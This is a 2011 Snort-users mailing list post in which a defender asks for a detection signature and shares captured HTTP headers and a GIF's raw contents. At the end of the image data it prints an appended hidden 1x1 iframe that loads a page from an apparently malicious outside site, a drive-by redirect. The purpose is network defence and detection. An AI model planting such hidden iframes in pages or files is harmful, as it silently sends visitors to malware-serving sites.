Snort mailing list archives
iFrame's in gifs
From: "Lay, James" <james.lay () wincofoods com>
Date: Fri, 24 Jun 2011 16:10:05 -0600
Hey all! Anyone got any leads on this or a sig for this? Excitement below..I have full pcap as well as the original image if anyone wants um. James Sanitized headers GET /img/ HTTP/1.1 Cookie: <snip> Host: magazine.gem-fashion.com Accept: */* Referer: http://magazine.gem-fashion.com/wearing-jewelry.html Accept-Language: en-us UA-CPU: x86 Connection: Keep-Alive HTTP/1.1 404 Object Not Found Date: Fri, 24 Jun 2011 21:15:39 GMT Server: Apache X-Powered-By: PHP/5.2.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: <snip>; path=/ Content-Length: 1221 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/gif GIF87a.............DBD...$"$...dbd.........TRT...424...trt.... ....LJL...,*,...ljl.........\Z\...<:<...|z|.........DFD...$&$...dfd..... ....TVT...464...tvt.........LNL...,.,...lnl.........\^\...<><...|~|...,. ............pH,....r.l:...tJ.Z...v..z...x.....%.<>...5;..o. .~.. .a .I.a|{0f?..?...z.v.V.!1....#..2.G.a>....B..*.....1...Qa2+`..I..(!K)).B.. .....I..H...9P....n%3 ....7E...B..-B... JhC..H...G...TaX@...D......%.@..!.........l.0.L....3n.r .."%..h.....>........K.R......<l.....`.z.v.......-].\..G.0:..@...W.#?.r. .....\x.."L.7..6M..-..?r..@d ..Q]b.......H4.3....&.........^|X.A..s./g........ Y.....O...P.)...@...;..r.p..6y....^..;,w.....i...4..p.x..I..E ...).<2 .......$...... ^.2.vo....`.(..y...B M<..1 ...dm)....y0.~.. ..D...Cs .'B.#LD.w?..A.F.......b.....4d.0.5..`..9%..... () C bIs.....R......z...R .!e.U^.Z.. ..@..@-BP8fy....; ..C.h.&.`..3..D<p.....%.0.0e...&D b.....B..4;.D.r7........P eJ(n.>$......y..I.!....~!Jj^>V..+...BX.....n..p.......2.@AA...C......J~ ...... .!.. !p..(|.|.....!A0>......PA..d0d.>.yD......1..B....B.-.x...'.p.H...`.2.$.. ..q.\....7D.. ..|..e:..`............*3.1..X.!.PA.;.m..H....;<iframe src='http://alaqiq.net/quran/gstata/index.php' width='1' height='1' style='visibility: hidden;'></iframe> ------------------------------------------------------------------------------ All the data continuously generated in your IT infrastructure contains a definitive record of customers, application performance, security threats, fraudulent activity and more. Splunk takes this data and makes sense of it. Business sense. IT sense. Common sense.. http://p.sf.net/sfu/splunk-d2d-c1 _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users Please see http://www.snort.org/docs for documentation
Current thread:
- iFrame's in gifs Lay, James (Jun 24)
- Re: iFrame's in gifs rmkml (Jun 24)
- Re: iFrame's in gifs waldo kitty (Jun 24)
- Re: iFrame's in gifs James Lay (Jun 24)
- Re: iFrame's in gifs Joel Esler (Jun 24)
- Re: iFrame's in gifs James Lay (Jun 24)
- Re: iFrame's in gifs Nigel Houghton (Jun 25)
- Re: iFrame's in gifs Joel Esler (Jun 25)
- Re: iFrame's in gifs Randal T. Rioux (Jun 26)
- Re: iFrame's in gifs James Lay (Jun 24)
- Re: iFrame's in gifs rmkml (Jun 24)